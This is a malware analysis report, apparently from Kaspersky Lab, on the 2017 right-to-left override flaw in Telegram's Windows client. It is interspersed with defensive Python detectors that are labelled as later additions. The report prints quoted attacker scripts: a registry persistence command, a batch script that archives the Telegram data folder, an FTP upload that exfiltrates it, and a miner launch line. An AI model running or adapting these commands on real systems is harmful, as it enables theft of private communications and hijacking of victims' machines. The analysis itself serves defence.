
Zero-day vulnerability in Telegram


In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.

Right-to-left override in a nutshell

The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after it in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is typically used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse.

Launching an attack on Telegram

Below is an account of how this vulnerability was exploited in Telegram:

  • The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:

defective.js -> photo_high_re*U+202E*gnp.js
Where *U+202E* is the RLO character that makes Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file – it still has the extension *.js.

  • The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file:

[image]

  • When the user clicks on this file, the standard Windows security notification is displayed:

[image]

Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched.
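The check a hardened client or a file-transfer gateway should perform on an attachment name, as an added example that is not part of the original article and not Telegram’s code: it flags Unicode bidi control characters, approximates what a naive renderer would display (the run after U+202E shown reversed; a simplification of the full bidi algorithm, assumed here to be adequate for filenames), compares the apparent extension with the one the file system will actually use, and renders the controls visibly. The sample names are constructed; the first is the renamed file from the article.

```python
import re

# Unicode bidirectional control characters. U+202E (RIGHT-TO-LEFT OVERRIDE) is the one
# abused against the Telegram client; the others are its siblings and get the same treatment.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI (isolates)
    "\u200e", "\u200f",                                # LRM, RLM (marks)
}


def real_extension(name: str) -> str:
    """Extension the file system and shell act on; control characters do not change it."""
    base = re.split(r"[\\/]", name)[-1]
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def displayed_name(name: str) -> str:
    """Approximate what a naive UI shows: the run after U+202E (up to U+202C or the end of
    the string) is rendered right-to-left, i.e. reversed; other controls are invisible.
    Simplified model of the Unicode bidi algorithm (assumption: adequate for filenames)."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            end = name.find("\u202c", i + 1)
            end = len(name) if end == -1 else end
            out.append(name[i + 1:end][::-1])
            i = end + 1
        elif ch in BIDI_CONTROLS:
            i += 1  # invisible, drop it
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def sanitize(name: str) -> str:
    """Render every bidi control visibly (e.g. <U+202E>) so the user sees the true name."""
    return "".join(f"<U+{ord(c):04X}>" if c in BIDI_CONTROLS else c for c in name)


def analyse(name: str) -> dict:
    """Classify an attachment name the way a hardened client or gateway could."""
    shown = displayed_name(name)
    real_ext, apparent_ext = real_extension(name), real_extension(shown)
    return {
        "sanitized": sanitize(name),
        "displayed": shown,
        "real_ext": real_ext,
        "apparent_ext": apparent_ext,
        "has_bidi_control": any(c in BIDI_CONTROLS for c in name),
        "extension_mismatch": real_ext != apparent_ext,
    }


if __name__ == "__main__":
    # Constructed samples: the renamed file from the article and an innocent one.
    for sample in ("photo_high_re\u202egnp.js", "photo.png"):
        print(analyse(sample))
```

A bidi control character has no legitimate place in a filename, so `has_bidi_control` alone is enough to block or quarantine; `extension_mismatch` and `displayed` are there to explain to the user what the name was pretending to be.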

Exploitation in the wild

After learning about the vulnerability, we started to research cases where it was actually exploited. These cases fall into several general scenarios.

Remote control

The purpose of this type of attack is to take control of the victim’s system, and involves the attacker studying the target system’s environment and installing additional modules.

[image: Attack flowchart]

At the first stage, a downloader is sent to the target, which is written in .Net, and uses the Telegram API as the command protocol:

[image]

With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled:

[image]

When launched, it modifies the startup registry key to gain persistence on the system and copies its executable file into one of the directories, depending on the environment:

[image]

Then it starts to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian:

[image]

The list of supported commands shows that the bot can silently install arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below:

Command (English translation): Function
“Онлайн (Online): Send list of files in directory to control bot.
“Запус (Launch): Launch executable file using Process.Start().
“Логгер (Logger): Check if tor process is running, download logg.zip, unpack it, delete the archive and launch its content.
“Скачать (Download): Download file into its own directory.
“Удалить (Delete): Delete file from its own directory.
“Распаковать (Unpack): Unpack archive in its own directory using specified password.
Убить (Kill): Terminate specified process using process.Kill()
Скачат (Download): Same as ‘Download’ (see above), with different command parsing.
Запуск (Launch): Same as ‘Launch’ (see above), with different command parsing.
Удалить (Delete): Same as ‘Delete’ (see above), with different command parsing.
Распаковать (Unpack): Same as ‘Unpack’ (see above), with different command parsing.
Процессы (Processes): Send a list of processes running on target PC to control bot.

An analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim.
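The downloader described above polls the Telegram Bot API every two seconds for commands, and that regularity is what a defender can detect at the proxy. The following is an added example, not code from the article or from Kaspersky Lab: it parses constructed proxy log lines (the format, the client processes and the bot tokens are all assumptions; the tokens are placeholders, not values from the incident), groups Bot API calls by client, process and bot id, and flags tight, regular polling. Only the numeric part of the token is kept in the alert, since the secret part is a credential.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed proxy log, not real telemetry: "<ISO timestamp> <client IP> <process> <URL>".
SAMPLE_LOG = """\
2017-10-12T10:00:00 10.0.0.5 downloader.exe https://api.telegram.org/bot123456789:PLACEHOLDERTOKEN/getUpdates?offset=0
2017-10-12T10:00:01 10.0.0.9 python.exe https://api.telegram.org/bot987654321:PLACEHOLDERTOKEN/sendMessage
2017-10-12T10:00:02 10.0.0.5 downloader.exe https://api.telegram.org/bot123456789:PLACEHOLDERTOKEN/getUpdates?offset=0
2017-10-12T10:00:03 10.0.0.7 chrome.exe https://web.telegram.org/
2017-10-12T10:00:04 10.0.0.5 downloader.exe https://api.telegram.org/bot123456789:PLACEHOLDERTOKEN/getUpdates?offset=0
2017-10-12T10:00:06 10.0.0.5 downloader.exe https://api.telegram.org/bot123456789:PLACEHOLDERTOKEN/getUpdates?offset=0
2017-10-12T10:00:08 10.0.0.5 downloader.exe https://api.telegram.org/bot123456789:PLACEHOLDERTOKEN/getUpdates?offset=0
2017-10-12T10:00:10 10.0.0.5 downloader.exe https://api.telegram.org/bot123456789:PLACEHOLDERTOKEN/getUpdates?offset=0
2017-10-12T10:07:00 10.0.0.9 python.exe https://api.telegram.org/bot987654321:PLACEHOLDERTOKEN/sendMessage
"""

# Bot API URLs have the shape https://api.telegram.org/bot<id>:<secret>/<method>
BOT_CALL = re.compile(r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")


def parse_log(text):
    """Return (time, client, process, bot_id, method) for every Bot API call in the log."""
    rows = []
    for line in text.strip().splitlines():
        ts, client, process, url = line.split(" ", 3)
        m = BOT_CALL.search(url)
        if m:
            rows.append((datetime.fromisoformat(ts), client, process, m.group(1), m.group(3)))
    return rows


def find_beacons(rows, min_calls=5, max_median_s=5.0):
    """Group Bot API calls by (client, process, bot id) and flag tight, regular polling."""
    groups = defaultdict(list)
    for ts, client, process, bot_id, method in rows:
        groups[(client, process, bot_id)].append((ts, method))
    alerts = []
    for (client, process, bot_id), calls in groups.items():
        if len(calls) < min_calls:
            continue
        calls.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(calls, calls[1:])]
        med = median(gaps)
        if med <= max_median_s:
            alerts.append({
                "client": client, "process": process,
                "bot_id": bot_id,  # numeric id only; the secret part of the token is never logged
                "method": calls[-1][1], "calls": len(calls),
                "median_interval_s": med, "max_interval_s": max(gaps),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_beacons(parse_log(SAMPLE_LOG)):
        print(alert)
```

Thresholds are assumptions to tune per environment: legitimate bots also call `getUpdates`, so the alert is a lead to pivot on (which process, is it signed, what else did it download), not a verdict on its own. The bot id in the alert is what you would pass to the investigation, not the token.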

Miners and more

Amid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new method of making money from their victims – namely, mining cryptocurrency using the resources of an infected computer. All they have to do is run a mining client on the victim’s computer and specify the details of their cryptocurrency wallet.

Scenario #1

[image: Attack flowchart]

At the first stage of the attack, an SFX archive with a script is used that launches an executable file:

Path=%temp%\adr
Setup=%temp%\adr\run.exe
Silent=1
Overwrite=2

This run.exe file is actually a BAT file. The batch script, after extraction, looks like this:

[image]

As we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a false sense of security.

Then, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive.

  • nheq.exe: an Equihash miner for NiceHash (in this particular case, it mined Zcash). Can use the resources of both the CPU and graphics accelerator:
    [image]
  • taskmgn.exe – another well-known miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a known specific string with pdb path:
    [image]

We have seen several versions of this batch script, some of which have additional features:

[image]

This particular version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive that contains other miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access:

[image]

The attack flowchart is approximately as follows:

[image]

We have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware.

[image]

The file address4.exe deserves a separate mention. Like the other files, it is an SFX archive with the following contents:

[image]

All components named st*.exe are executable PE files converted in a similar way from batch scripts.

The SFX script launches the component st1.exe:

Path=%temp%/adress
Setup=%temp%/adress/st1.exe
Silent=1
Overwrite=2

st1.exe adds st2.exe to the system startup by writing the appropriate value to the system registry:

reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f

So the st2.exe file launches the next time the system boots:

TIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch
chcp 1251
tskill telegram
taskkill /IM telegram.exe #Terminates Telegram processes
md %temp%\sss
cd %temp%\sss #Creates a temporary directory
"%temp%\adress\WinRAR.exe" A -ibck -inul -r -agYY-mm-dd-hh-mm-ss "%temp%\sss\1.rar" "%appdata%\Telegram Desktop" #Packs the Telegram directory into a RAR archive
TIMEOUT /T 60 /NOBREAK
:start
ping -n 1 ya.ru |>nul find /i "TTL=" && (start "" %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :start) #Checks Internet connection and launches st3.exe

As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier:

@echo XXXXXXXX>command.txt
@echo XXXXXXXX>>command.txt
@echo binary>>command.txt
@echo mput %temp%\sss\*.rar>>command.txt
@echo quit>>command.txt
ftp -s:command.txt -i free11.receive.com
del command.txt
attrib %temp%/adress +H
attrib %temp%/adress\* +H

On that FTP server, we found several archives of this kind containing Telegram directories stolen from the victims:

[image]

Each dump contains, in addition to the Telegram client’s executables and utility files, an encrypted local cache containing different files used in personal communications: documents, video and audio files and images.

Scenario #2

[image]

Just like in the previous scenario, an attack begins with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then download and launch the payload:

[image]

The payload is an SFX archive with the following script:

[image]

svchost.vbs is a script controlling the launch of the CryptoNight miner (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed.

The script contains the following comments:

[image]

The miner itself is launched as follows:

WshShell.Run "csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1" & cores, 0

The pool address is associated with the cryptocurrency Monero.

On the server itself, in addition to the specified payload files, we found similar SFX archives with miners:

[image]
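The svchost.vbs watchdog in this scenario leaves two traces a defender can key on: a process whose command line points at a stratum pool, and a process that dies within seconds of a task manager appearing and comes back within seconds of it closing. The following is an added example, not code from the article or from Kaspersky Lab, that runs both checks over a constructed process-event log (the line format is an assumption; the pool host and wallet are placeholders, not values from the incident).

```python
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed process-event log, not real telemetry:
# "<ISO time>|<start|stop>|<image>|<command line>"
SAMPLE_EVENTS = """\
2017-11-03T10:00:00|start|explorer.exe|explorer.exe
2017-11-03T10:00:05|start|wscript.exe|wscript.exe svchost.vbs
2017-11-03T10:00:06|start|csrs.exe|csrs.exe -a cryptonight -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER -p x
2017-11-03T10:05:00|start|taskmgr.exe|taskmgr.exe
2017-11-03T10:05:01|stop|csrs.exe|
2017-11-03T10:06:00|stop|taskmgr.exe|
2017-11-03T10:06:02|start|csrs.exe|csrs.exe -a cryptonight -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER -p x
"""

# Command-line markers of a mining client (stratum pool URL, CryptoNight algorithm switch).
MINER_PATTERNS = [re.compile(p, re.I) for p in (r"stratum\+(tcp|ssl)://", r"\bcryptonight\b")]
# The two analysis tools the VBScript watches for.
ANALYSIS_TOOLS = {"taskmgr.exe", "processhacker.exe"}


@dataclass
class Event:
    time: datetime
    kind: str      # "start" or "stop"
    image: str
    cmdline: str


def parse_events(text):
    events = []
    for line in text.strip().splitlines():
        ts, kind, image, cmdline = line.split("|", 3)
        events.append(Event(datetime.fromisoformat(ts), kind, image.lower(), cmdline))
    return events


def miner_starts(events):
    """Process starts whose command line looks like a mining client."""
    return [e for e in events
            if e.kind == "start" and any(p.search(e.cmdline) for p in MINER_PATTERNS)]


def tool_evasion(events, window_s=10):
    """Miner that dies right after an analysis tool appears and returns right after it exits."""
    miners = {e.image for e in miner_starts(events)}
    hits = []
    for tool in (e for e in events if e.kind == "start" and e.image in ANALYSIS_TOOLS):
        tool_exit = next((e for e in events if e.kind == "stop" and e.image == tool.image
                          and e.time > tool.time), None)
        for death in events:
            if not (death.kind == "stop" and death.image in miners):
                continue
            killed_after = (death.time - tool.time).total_seconds()
            if not 0 <= killed_after <= window_s:
                continue
            restart = None
            if tool_exit is not None:
                restart = next((e for e in events if e.kind == "start" and e.image == death.image
                                and 0 <= (e.time - tool_exit.time).total_seconds() <= window_s), None)
            hits.append({"miner": death.image, "tool": tool.image,
                         "killed_after_s": killed_after, "restarted": restart is not None})
    return hits


if __name__ == "__main__":
    ev = parse_events(SAMPLE_EVENTS)
    print([e.cmdline for e in miner_starts(ev)])
    print(tool_evasion(ev))
```

The command-line check catches the miner on its own; the evasion check is the higher-confidence signal, because a process that reacts to Task Manager being opened is not a process the user launched on purpose. The `window_s` value is an assumption to tune against how often the watchdog polls.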

Conclusion

It appears that only Russian cybercriminals were aware of this vulnerability, with all the exploitation cases that we detected taking place in Russia. Also, while conducting detailed research into these attacks we found a lot of artifacts that pointed to involvement by Russian cybercriminals.

We don’t have exact information about how long and which versions of the Telegram products were affected by the vulnerability. What we do know is that its exploitation in Windows clients began in March 2017. We informed the Telegram developers of the problem, and the vulnerability no longer occurs in Telegram’s products.

This paper presents only those cases that were reported by Kaspersky Lab’s telemetry systems. The full scope and other methods of exploitation remain unknown.

IoC

MD5

First stage

650DDDE919F9E5B854F8C375D3251C21
C384E62E483896799B38437E53CD9749
FA391BEAAF8B087A332833E618ABC358
52F7B21CCD7B1159908BCAA143E27945
B1760E8581F6745CBFCBE76FBD0ACBFA
A662D942F0E43474984766197288845B

Payloads

B9EEC74CA8B14F899837A6BEB7094F65
46B36F8FF2369E883300F472694BBD4D
10B1301EAB4B4A00E7654ECFA6454B20
CD5C5423EC3D19E864B2AE1C1A9DDBBC
7A3D9C0E2EA27F1B96AEFED2BF8971A4
E89FDDB32D7EC98B3B68AB7681FACCFC
27DDD96A87FBA2C15B5C971BA6EB80C6
844825B1336405DDE728B993C6B52A83
C6A795C27DEC3F5559FD65884457F6F3
89E42CB485D65F71F62BC1B64C6BEC95
0492C336E869A14071B1B0EF613D9899
2CC9ECD5566C921D3876330DFC66FC02
1CE28167436919BD0A8C1F47AB1182C4

C2 servers

http://nord.adr[.]com[.]ua/

Filenames

title?gpj.exe
title?gpj.rar
address?gpj.scr
address_?gpj.scr
photoadr?gepj.scr
